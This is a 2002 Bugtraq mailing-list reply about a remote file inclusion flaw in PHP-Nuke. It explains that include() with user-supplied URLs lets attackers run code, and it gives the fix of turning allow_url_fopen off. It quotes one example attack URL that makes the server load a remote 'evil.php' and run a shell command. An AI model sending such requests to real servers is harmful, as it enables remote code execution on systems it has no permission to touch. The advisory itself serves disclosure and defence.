Bugtraq mailing list archives
Re: PHP-Nuke allows Command Execution & Much more
From: truff <truff () ifrance com>
Date: Mon, 21 Jan 2002 14:43:29 +0100
Hi All! I've found a serious security flaw in PHP-Nuke. It allows user to execute any PHP code. ..... Then just requesting
http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
.......
Hello, I used to find this flaw in a lot of _home made_ scripts. This is due to the use of the include() function with user passed parameters, and it is not particular to phpnuke. It exists in a lot of scripts cause the php default config allows to pass http:// and ftp:// parameters to functions like include(). As it is said in the php manual: "As long as support for the "URL fopen wrapper" is enabled when you configure PHP (which it is unless you explicitly pass the --disable-url-fopen-wrapper flag to configure (for versions up to 4.0.3) or set allow_url_fopen to off in php.ini (for newer versions)), you can use HTTP and FTP URLs with most functions that take a filename as a parameter, including the require() and include() statements." Quick Fix: Just set allow_url_fopen to off in php.ini . - www.projet7.org - Security Researchs ______________________________________________________________________________ ifrance.com, l'email gratuit le plus complet de l'Internet ! vos emails depuis un navigateur, en POP3, sur Minitel, sur le WAP... http://www.ifrance.com/_reloc/email.emailif
Current thread:
- PHP-Nuke allows Command Execution & Much more Handle Nopman (Jan 16)
- <Possible follow-ups>
- Re: PHP-Nuke allows Command Execution & Much more truff (Jan 21)
- Re: PHP-Nuke allows Command Execution & Much more RoMaNSoFt (Jan 24)